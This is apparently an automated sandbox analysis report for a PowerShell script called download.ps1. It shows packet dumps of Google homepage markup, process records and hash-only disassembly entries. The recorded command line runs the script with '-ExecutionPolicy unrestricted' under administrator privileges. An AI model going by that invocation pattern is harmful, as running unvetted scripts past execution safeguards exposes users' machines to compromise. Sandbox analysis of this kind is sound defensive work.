                                                                                                            Jan 11, 2025 09:45:40.725964069 CET1289INData Raw: 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e
                                                                                                            Data Ascii: elp you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.
                                                                                                            Jan 11, 2025 09:45:40.726090908 CET1289INData Raw: 32 2c 32 32 2c 31 34 33 2c 39 34 2c 38 37 2c 36 33 38 2c 37 32 34 2c 35 2c 39 32 31 2c 31 33 36 2c 35 34 35 2c 38 38 34 2c 32 34 2c 36 35 31 2c 33 34 2c 32 33 2c 33 39 39 2c 38 2c 32 31 36 2c 31 31 2c 34 35 32 2c 34 30 2c 31 32 39 39 2c 33 31 31
                                                                                                            Data Ascii: 2,22,143,94,87,638,724,5,921,136,545,884,24,651,34,23,399,8,216,11,452,40,1299,311,264,152,6,269,2,84,286,406,375,2,61,180,172,533,450,142,256,347,57,5,412,229,181,274,59,211,563,139,119,222,92,182,33,139,2644,1151,4,699,2873,473,164,3,418,641
                                                                                                            Jan 11, 2025 09:45:40.726134062 CET1289INData Raw: 3d 22 2b 53 74 72 69 6e 67 28 61 29 2b 22 26 63 61 64 3d 22 2b 28 62 2b 65 2b 63 29 7d 3b 6c 3d 67 6f 6f 67 6c 65 2e 6b 45 49 3b 67 6f 6f 67 6c 65 2e 67 65 74 45 49 3d 6e 3b 67 6f 6f 67 6c 65 2e 67 65 74 4c 45 49 3d 70 3b 67 6f 6f 67 6c 65 2e 6d
                                                                                                            Data Ascii: ="+String(a)+"&cad="+(b+e+c)};l=google.kEI;google.getEI=n;google.getLEI=p;google.ml=function(){return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a
                                                                                                            Jan 11, 2025 09:45:40.726290941 CET1289INData Raw: 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 61 3b 61 3a 7b 66 6f 72 28 61 3d 62 2e 74 61 72 67 65 74 3b 61 26 26 61 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 61 3d 61 2e 70 61
                                                                                                            Data Ascii: "click",function(b){var a;a:{for(a=b.target;a&&a!==document.documentElement;a=a.parentElement)if(a.tagName==="A"){a=a.getAttribute("data-nohref")==="1";break a}a=!1}a&&b.preventDefault()},!0);}).call(this);</script><style>#gb{font:13px/27px Ar
                                                                                                            Jan 11, 2025 09:45:40.726372957 CET1289INData Raw: 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 2e 67 62 72 74 6c 20 2e 67 62 6d 7b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 31 70 78
                                                                                                            Data Ascii: rgba(0,0,0,.2);box-shadow:0 2px 4px rgba(0,0,0,.2)}.gbrtl .gbm{-moz-box-shadow:1px 1px 1px rgba(0,0,0,.2)}.gbto .gbm,.gbto #gbs{top:29px;visibility:visible}#gbz .gbm{left:0}#gbg .gbm{right:0}.gbxms{background-color:#ccc;display:block;position:
                                                                                                            Jan 11, 2025 09:45:40.726511955 CET1289INData Raw: 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 73 70 61 6e 23 67 62 67 36 2c 73 70 61 6e 23 67 62 67 34 7b
                                                                                                            Data Ascii: {cursor:pointer;display:block;text-decoration:none !important}span#gbg6,span#gbg4{cursor:default}.gbts{border-left:1px solid transparent;border-right:1px solid transparent;display:block;*display:inline-block;padding:0 5px;position:relative;z-i
                                                                                                            Jan 11, 2025 09:45:40.726624966 CET1289INData Raw: 65 7d 2e 67 62 67 34 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 7d 2e 67 62 67 34 61 20 2e 67 62 74 73 7b 70 61 64 64 69 6e 67 3a 32 37 70 78 20 35 70 78 20 30 3b 2a 70 61 64 64 69 6e 67 3a 32 35 70 78 20 35
                                                                                                            Data Ascii: e}.gbg4a{font-size:0;line-height:0}.gbg4a .gbts{padding:27px 5px 0;*padding:25px 5px 0}.gbto .gbg4a .gbts{padding:29px 5px 1px;*padding:27px 5px 1px}#gbi4i,#gbi4id{left:5px;border:0;height:24px;position:absolute;top:1px;width:24px}.gbto #gbi4i
                                                                                                            Jan 11, 2025 09:45:40.726720095 CET1289INData Raw: 31 30 70 78 7d 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 62 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 31 3a 76 69 73
                                                                                                            Data Ascii: 10px}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{*display:inline}.gbml1,.gbml1:visited{padding:0 10px}.gbml1-hvr,.gbml1:focus{outline:none;text-decoration:underline !important}#gbpm .gbml1{display:inline;margin:0;padding:0;white-space:nowrap}.
                                                                                                            Jan 11, 2025 09:45:40.726886034 CET1289INData Raw: 6d 74 63 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 7d 23 67 62 64 34 20 2e 67 62 70 63 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 31 36 70 78 20 30
                                                                                                            Data Ascii: mtc{border-bottom:1px solid #bebebe}#gbd4 .gbpc{display:inline-block;margin:16px 0 10px;padding-right:50px;vertical-align:top}#gbd4 .gbpc{*display:inline}.gbpc .gbps,.gbpc .gbps2{display:block;margin:0 20px}#gbmplp.gbps{margin:0 10px}.gbpc .gb
                                                                                                            Jan 11, 2025 09:45:40.844624996 CET1289INData Raw: 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 67 62 6d 70 69 61 61 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 67 62 6d 70 69 61 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 64 69 73 70 6c 61 79 3a
                                                                                                            Data Ascii: ibility:hidden}.gbmpiaa{display:block;margin-top:10px}.gbmpia{border:none;display:block;height:48px;width:48px}.gbmpnw{display:inline-block;height:auto;margin:10px 0;vertical-align:top}.gbqfb,.gbqfba,.gbqfbb{-moz-border-radius:2px;-webkit-bor


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:1
                                                                                                            Start time:03:45:35
                                                                                                            Start date:11/01/2025
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                            Imagebase:0x7ff7d6220000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:2
                                                                                                            Start time:03:45:35
                                                                                                            Start date:11/01/2025
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff77ee10000
                                                                                                            File size:875'008 bytes
                                                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Disassembly

                                                                                                            Reset < >

                                                                                                              Executed Functions

                                                                                                              Function 00007FFE0BD04E6F Relevance: .1, Instructions: 130COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.36332096426.00007FFE0BD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE0BD00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffe0bd00000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0c591bdd9b905eee3f20d956c902132fbcead28e8682ea6fcf30bb93cd1702c6
                                                                                                              • Instruction ID: a8fb45437796b738dcc98c1c0528e50bf3773e9b471535b597bc7f3636aba6fb
                                                                                                              • Opcode Fuzzy Hash: 0c591bdd9b905eee3f20d956c902132fbcead28e8682ea6fcf30bb93cd1702c6
                                                                                                              • Instruction Fuzzy Hash: C0314521A2EBC60FD35A877858546A1FFE0FF57214B0805FBD089CB2F3DA18A845C792
                                                                                                              Function 00007FFE0BAB3635 Relevance: .1, Instructions: 84COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.36327589844.00007FFE0BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE0BAB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffe0bab0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 59bdb13451e94b80037e8896f356a268a2799e5844e169b295c558a0ea37884d
                                                                                                              • Instruction ID: 5575419d39bd151bdd5f437c35eb21f54d5740c534ad8c41066c699f75f19794
                                                                                                              • Opcode Fuzzy Hash: 59bdb13451e94b80037e8896f356a268a2799e5844e169b295c558a0ea37884d
                                                                                                              • Instruction Fuzzy Hash: 2B211730A1894D8FDF94EF58C455EADB7F2FF68750F140169D40AD72A6CA24E882CB81
                                                                                                              Function 00007FFE0B99EE9C Relevance: .0, Instructions: 50COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.36326785308.00007FFE0B99D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE0B99D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffe0b99d000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 68a54e8f01d2e84ce09cd9133bb52237d8f878e925d543b886d3d3f496ae416d
                                                                                                              • Instruction ID: 20663b9599282faf1e1b0ec5d2b946b595309099e49a01c400adea531d2edf97
                                                                                                              • Opcode Fuzzy Hash: 68a54e8f01d2e84ce09cd9133bb52237d8f878e925d543b886d3d3f496ae416d
                                                                                                              • Instruction Fuzzy Hash: 07011E70918E088FDB94EF2DC489A167BF1FB98311B504A5EE459C7375D730E885CB81
                                                                                                              Function 00007FFE0BAB5675 Relevance: .0, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.36327589844.00007FFE0BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE0BAB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffe0bab0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: aefb34bc72852e3e424bb1f7cd44f871588890b662148cf9d870b668dd6874b1
                                                                                                              • Instruction ID: 2e69b10d1031f513dcbaba991ecf18e946eaa70f6f4b75a523486a3e8d6cec48
                                                                                                              • Opcode Fuzzy Hash: aefb34bc72852e3e424bb1f7cd44f871588890b662148cf9d870b668dd6874b1
                                                                                                              • Instruction Fuzzy Hash: A501677111CB0C8FD748EF0CE451AA5B7E0FB95364F10056EE58AC36A1D736E882CB45
                                                                                                              Function 00007FFE0B99EE95 Relevance: .0, Instructions: 42COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.36326785308.00007FFE0B99D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE0B99D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffe0b99d000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7fa997e1be773747c29e2f4946e0bf9f57006bf4c19c27589582fd85ecf828a6
                                                                                                              • Instruction ID: 3fee46bd30cbf8170b76bf5a847b41e55fb777a412eb2c84018759ed4cf922df
                                                                                                              • Opcode Fuzzy Hash: 7fa997e1be773747c29e2f4946e0bf9f57006bf4c19c27589582fd85ecf828a6
                                                                                                              • Instruction Fuzzy Hash: 41F0303260CE088F9AA4EB1DF485DA573E0FB58320750066BD04AC7576DA25F886CBC1
                                                                                                              Function 00007FFE0BD03C66 Relevance: .0, Instructions: 36COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.36332096426.00007FFE0BD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE0BD00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffe0bd00000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f94d242aa7340b6e138be1bf29cc430824f023becddbeefa1d58e037e0a2c12f
                                                                                                              • Instruction ID: 41e23bb67f0fab5ed862bcbfd5f5ab2c79d3120fd2000d78536fdc84fda7f837
                                                                                                              • Opcode Fuzzy Hash: f94d242aa7340b6e138be1bf29cc430824f023becddbeefa1d58e037e0a2c12f
                                                                                                              • Instruction Fuzzy Hash: 39F08231E1C5088FD758EB58E4499E8B7E1FF49320B1500FBD14EC7173DA25AC458785